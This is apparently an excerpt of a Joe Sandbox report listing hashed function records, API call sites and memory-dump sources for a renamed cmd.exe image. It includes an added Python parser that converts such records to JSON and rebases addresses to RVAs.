• Instruction ID: 1c39607460ae3d0be567e9c1927f7195a1b390b51a89bcdf18a47feaad569982
• Opcode Fuzzy Hash: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
• Instruction Fuzzy Hash: 4E219F63A08642C6E7245F60A444279B6A1FF8DB94F848675DA0FC3390DF3DE48CC706
APIs
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: CreateDirectoryDriveFullNamePathTypememset
• String ID:
• API String ID: 1397130798-0
• Opcode ID: 53223a99652f8e81a4eeb04428d23ca491e991d1bc8129b69f2a7ec7696704bc
• Instruction ID: eab0ab2fa775c3779899e1419bec95fbfc8d371a018df17a62cd1ff2807a744d
• Opcode Fuzzy Hash: 53223a99652f8e81a4eeb04428d23ca491e991d1bc8129b69f2a7ec7696704bc
• Instruction Fuzzy Hash: 3C919E33A48A82D6EB658F2194543B973E1FF88B84F448135DA4E83794DF3EE648C706
APIs
  • Part of subcall function 00007FF6E94306C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E942B4DB), ref: 00007FF6E94306D6
  • Part of subcall function 00007FF6E94306C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E942B4DB), ref: 00007FF6E94306F0
  • Part of subcall function 00007FF6E94306C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E942B4DB), ref: 00007FF6E943074D
  • Part of subcall function 00007FF6E94306C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E942B4DB), ref: 00007FF6E9430762
• _wcsicmp.MSVCRT ref: 00007FF6E94325CA
• _wcsicmp.MSVCRT ref: 00007FF6E94325E8
• _wcsicmp.MSVCRT ref: 00007FF6E943260F
• _wcsicmp.MSVCRT ref: 00007FF6E9432636
• _wcsicmp.MSVCRT ref: 00007FF6E9432650
Strings
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: _wcsicmp$Heap$AllocProcess
• String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
• API String ID: 3407644289-1668778490
• Opcode ID: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
• Instruction ID: 9215073e53b5d72b3419e73aa678f15d5df475a5b5bd516f1ee2120d46fbed61
• Opcode Fuzzy Hash: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
• Instruction Fuzzy Hash: 3A314D63A1C612C6F724AF71E8193793694AF85B80F548035EA0EC62E5DE3EE40DC70B
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: memset$callocfreememmovewcschr$AttributesErrorFileLastqsorttowupperwcsrchr
• String ID: &()[]{}^=;!%'+,`~
• API String ID: 2516562204-381716982
• Opcode ID: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
• Instruction ID: b0ee8ff15a8bcd448c0ce00fd40dacf8da366bb54241b69f76d0695651ac44c7
• Opcode Fuzzy Hash: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
• Instruction Fuzzy Hash: 34C1BB73A18A51C6E7608F61A8403BE77A1FF48B98F405125EE8D83B98DF3DE498C705
APIs
  • Part of subcall function 00007FF6E942D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6E942D46E
  • Part of subcall function 00007FF6E942D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6E942D485
  • Part of subcall function 00007FF6E942D3F0: wcschr.MSVCRT ref: 00007FF6E942D4EE
  • Part of subcall function 00007FF6E942D3F0: iswspace.MSVCRT ref: 00007FF6E942D54D
  • Part of subcall function 00007FF6E942D3F0: wcschr.MSVCRT ref: 00007FF6E942D569
  • Part of subcall function 00007FF6E942D3F0: wcschr.MSVCRT ref: 00007FF6E942D58C
• iswspace.MSVCRT ref: 00007FF6E9437EEE
Strings
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: wcschr$Heapiswspace$AllocProcess
• String ID: A
• API String ID: 3731854180-3554254475
• Opcode ID: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
• Instruction ID: 0295f1f323de2dd52e52ddd8509302006aef7f17d40aea1841651220a9810db5
• Opcode Fuzzy Hash: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
• Instruction Fuzzy Hash: 85A179B3909682C6E7209F61A45437DB7A0FF49790F008135DA8D87795EF3EE859CB0A
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: MemoryProcessRead$AddressLibraryLoadProc
• String ID: NTDLL.DLL$NtQueryInformationProcess
• API String ID: 1580871199-2613899276
• Opcode ID: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
• Instruction ID: 40b915719c5e0a68cf2e38e263d5ce115921f61e873c6ff3da45763a584f7d29
• Opcode Fuzzy Hash: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
• Instruction Fuzzy Hash: 31515072A18B92D6EB108F55A8002B977E4FF88B84F445135DA5E83798DF3DD00ACB09
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                         • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
                                                                                                                                                                        • String ID: con
                                                                                                                                                                        • API String ID: 689241570-4257191772
                                                                                                                                                                        • Opcode ID: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
                                                                                                                                                                        • Instruction ID: 1ae487352446b11dac64dd52da5ca37f5c949ac48f6a7c21e47e0669b5d2f4fa
                                                                                                                                                                        • Opcode Fuzzy Hash: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
                                                                                                                                                                        • Instruction Fuzzy Hash: 4E415E32A08A45C6E3108F15948437DBAA1FB89BA4F558334DE2983790DF3EE94DCB45
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                         • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$File$Process$AllocCloseCreateFreeHandlePointerRead
                                                                                                                                                                        • String ID: PE
                                                                                                                                                                        • API String ID: 2941894976-4258593460
                                                                                                                                                                        • Opcode ID: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                                                                                                                                                        • Instruction ID: 32f4d8a42bd1011fea8040cdf475efe36591b3ca8cd0e2f2818bded6e0f1d897
                                                                                                                                                                        • Opcode Fuzzy Hash: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                                                                                                                                                        • Instruction Fuzzy Hash: 40413262A08651D6EB209F51E410379BBE0FF89B90F448230DE5D86B95DF3EE44ACF06
                                                                                                                                                                        APIs
                                                                                                                                                                        • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF6E944849D,?,?,?,00007FF6E944F0C7), ref: 00007FF6E9430045
                                                                                                                                                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF6E944F0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6E944E964), ref: 00007FF6E9430071
                                                                                                                                                                        • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6E9430092
                                                                                                                                                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF6E94300A7
                                                                                                                                                                        • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6E9430148
                                                                                                                                                                        • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF6E9430181
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                         • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$LockPointerShared$AcquireByteCharMultiReadReleaseWide
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 734197835-0
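                                                                                                                                                                         The function records in this section are flat text: fuzzy hashes, one "Api.Module(args), ref: address" line per call site, the memory dump the function was lifted from, and the similarity IDs. The following parser, added here as an example and not part of the Joe Sandbox report or its IDA plugin, turns one such record into structured data and rebases every call-site reference to an RVA against the "Offset:" image base, so the same function can be located in another dump of the renamed cmd.exe copy. The sample input is the record immediately above, copied in with the page indentation removed. Only the first four dump-name fields (process index, phase, dump id, base address) are read off the page directly; decoding the fifth as a Win32 page-protection value and the seventh as a memory type is an assumption made for this example, chosen because the values on the page (0x20 for the code region, 0x02 and 0x04 for the data regions, 0x1000000 throughout) line up with those constants.

```python
import json
import re
from typing import Optional

# Constructed sample input: the function record shown above, with the page's
# indentation stripped. Nothing else about the format is assumed.
RECORD = """\
• Opcode ID: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
• Instruction ID: 32f4d8a42bd1011fea8040cdf475efe36591b3ca8cd0e2f2818bded6e0f1d897
• Opcode Fuzzy Hash: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
• Instruction Fuzzy Hash: 40413262A08651D6EB209F51E410379BBE0FF89B90F448230DE5D86B95DF3EE44ACF06
APIs
• SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF6E944849D,?,?,?,00007FF6E944F0C7), ref: 00007FF6E9430045
• AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF6E944F0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6E944E964), ref: 00007FF6E9430071
• ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6E9430092
• ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF6E94300A7
• SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6E9430148
• MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF6E9430181
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
Similarity
• API ID: File$LockPointerShared$AcquireByteCharMultiReadReleaseWide
• String ID:
• API String ID: 734197835-0
"""

# One call-site line. Handles the "Part of subcall function <addr>:" prefix,
# an optional argument list, and decorated names such as ??_V@YAXPEAX@Z.MSVCRT.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>[^.\s(]+)\.(?P<module>[A-Za-z0-9_-]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$",
    re.IGNORECASE,
)

# Dump file name. ASSUMPTION (example only): field 5 is a PAGE_* protection
# and field 7 a MEM_* type; fields 6 and 8 are kept raw because their meaning
# is not documented on the page.
DUMP_RE = re.compile(
    r"^(?P<proc>\d{8})\.(?P<phase>\d{8})\.(?P<dump>\d+)\.(?P<base>[0-9A-F]{16})"
    r"\.(?P<prot>[0-9A-F]{8})\.(?P<f6>[0-9A-F]{8})\.(?P<mtype>[0-9A-F]{8})\.(?P<f8>[0-9A-F]{8})\.sdmp$",
    re.IGNORECASE,
)
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
SECTIONS = ("APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")


def parse_api_line(line: str) -> Optional[dict]:
    """Parse one call-site bullet; return None if the line is not one."""
    m = API_RE.match(line.strip())
    if not m:
        return None
    args = m["args"]
    return {"name": m["name"], "module": m["module"],
            "args": None if args is None else args.split(","),
            "ref": int(m["ref"], 16),
            "subcall": None if m["sub"] is None else int(m["sub"], 16)}


def parse_dump_name(name: str) -> dict:
    """Split a .sdmp file name into its fields (see ASSUMPTION above)."""
    m = DUMP_RE.match(name.strip())
    if not m:
        raise ValueError(f"not a Joe Sandbox dump name: {name}")
    prot, mtype = int(m["prot"], 16), int(m["mtype"], 16)
    return {"process_index": int(m["proc"]), "phase": int(m["phase"]),
            "dump_id": int(m["dump"]), "base": int(m["base"], 16),
            "protection": PAGE_PROTECT.get(prot, f"0x{prot:X}"),
            "mem_type": MEM_TYPE.get(mtype, f"0x{mtype:X}"),
            "raw_field6": m["f6"], "raw_field8": m["f8"]}


def parse_record(text: str) -> dict:
    """Parse one function record; call-site refs get an 'rva' relative to the image base."""
    rec = {"hashes": {}, "apis": [], "dump": None, "image_base": None, "similarity": {}}
    section = "header"
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            section = line
            continue
        api = parse_api_line(line) if section == "APIs" else None
        if api:
            rec["apis"].append(api)
            continue
        if ":" not in line:
            continue
        key, value = (s.strip() for s in line.lstrip("• ").split(":", 1))
        if section == "header":
            rec["hashes"][key] = value
        elif section == "Memory Dump Source" and key == "Source File":
            name, _, rest = value.partition(",")
            rec["dump"] = parse_dump_name(name)
            off = re.search(r"Offset:\s*([0-9A-F]+)", rest, re.IGNORECASE)
            rec["image_base"] = int(off[1], 16) if off else None
        elif section == "Similarity":
            # "$"-separated lists for API ID / String ID; the numeric pair is kept as-is.
            if key in ("API ID", "String ID"):
                rec["similarity"][key] = value.split("$") if value else []
            else:
                rec["similarity"][key] = value
    if rec["image_base"] is not None:
        for api in rec["apis"]:
            api["rva"] = api["ref"] - rec["image_base"]
    return rec


if __name__ == "__main__":
    print(json.dumps(parse_record(RECORD), indent=2))
```

Rebasing matters because the dumped image is at 0x7FF6E9420000 in this run only; the RVA (here 0x10045 for the first SetFilePointer call) is what survives ASLR and lets the same call site be found in a dump taken from another execution or another host.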
                                                                                                                                                                        • Opcode ID: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
                                                                                                                                                                        • Instruction ID: a72c34c6ec7aae69770468cb8ff2fb82258a5d31919e17674b56a82a47bc0f54
                                                                                                                                                                        • Opcode Fuzzy Hash: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
                                                                                                                                                                        • Instruction Fuzzy Hash: 35619EB3A18692C6E725CF31A8083797BA1BF46B44F448235DD5E82794DF7EA40DC70A
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                         • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Enum$Openwcsrchr
                                                                                                                                                                        • String ID: %s=%s$.$\Shell\Open\Command
                                                                                                                                                                        • API String ID: 3402383852-1459555574
                                                                                                                                                                        • Opcode ID: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                                                                                                                                        • Instruction ID: 9c6e238f07f120f9c37ef0aba21584a856fe203490298f3760e695a72d79fa38
                                                                                                                                                                        • Opcode Fuzzy Hash: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                                                                                                                                        • Instruction Fuzzy Hash: 6CA1D563A08642C2EE209F55D4103B963A0FF85F90F904531DA4D877C4EF7EE94ADB0A
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                         • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$wcscmp
                                                                                                                                                                        • String ID: %s
                                                                                                                                                                        • API String ID: 243296809-3043279178
                                                                                                                                                                        • Opcode ID: b0ad3edef7fc64e03d81687a8a254aeebb6f4c69458638a3e2c38bf1209308ef
                                                                                                                                                                        • Instruction ID: 35457dfb64f697f5c90f31c868b0243bc84987408edfc81b52f1e5144c35dd8f
                                                                                                                                                                        • Opcode Fuzzy Hash: b0ad3edef7fc64e03d81687a8a254aeebb6f4c69458638a3e2c38bf1209308ef
                                                                                                                                                                        • Instruction Fuzzy Hash: E7A18A33A09686D6EB25DF31D8443F963A0BF48748F104035DA8E8BA95EF3DE649C306
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                         • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$EnvironmentVariable
                                                                                                                                                                        • String ID: DIRCMD
                                                                                                                                                                        • API String ID: 1405722092-1465291664
                                                                                                                                                                        • Opcode ID: ffb8ac6f460930c1464a251cfe4f6a37909ed3687fd59a2300d1627ea223b7d7
                                                                                                                                                                        • Instruction ID: acfadb4ba49177fda3485167a3b96f281019fc866320c404ac550f03985678f9
                                                                                                                                                                        • Opcode Fuzzy Hash: ffb8ac6f460930c1464a251cfe4f6a37909ed3687fd59a2300d1627ea223b7d7
                                                                                                                                                                        • Instruction Fuzzy Hash: BB812773A18B82CAEB24CF60A8803ED37A5FB48748F404139DA8D97B59DF39D149C705
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00007FF6E942CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E942B9A1,?,?,?,?,00007FF6E942D81A), ref: 00007FF6E942CDA6
                                                                                                                                                                          • Part of subcall function 00007FF6E942CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E942B9A1,?,?,?,?,00007FF6E942D81A), ref: 00007FF6E942CDBD
                                                                                                                                                                        • wcschr.MSVCRT(?,?,?,00007FF6E94299DD), ref: 00007FF6E9429A39
                                                                                                                                                                          • Part of subcall function 00007FF6E942DF60: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000,00007FF6E942CEAA), ref: 00007FF6E942DFB8
                                                                                                                                                                          • Part of subcall function 00007FF6E942DF60: RtlFreeHeap.NTDLL ref: 00007FF6E942DFCC
                                                                                                                                                                          • Part of subcall function 00007FF6E942DF60: _setjmp.MSVCRT ref: 00007FF6E942E03E
                                                                                                                                                                        • wcschr.MSVCRT(?,?,?,00007FF6E94299DD), ref: 00007FF6E9429AF0
                                                                                                                                                                        • wcschr.MSVCRT(?,?,?,00007FF6E94299DD), ref: 00007FF6E9429B0F
                                                                                                                                                                          • Part of subcall function 00007FF6E94296E8: memset.MSVCRT ref: 00007FF6E94297B2
                                                                                                                                                                          • Part of subcall function 00007FF6E94296E8: ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF6E9429880
                                                                                                                                                                        • _wcsupr.MSVCRT ref: 00007FF6E943B844
                                                                                                                                                                        • wcscmp.MSVCRT ref: 00007FF6E943B86D
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
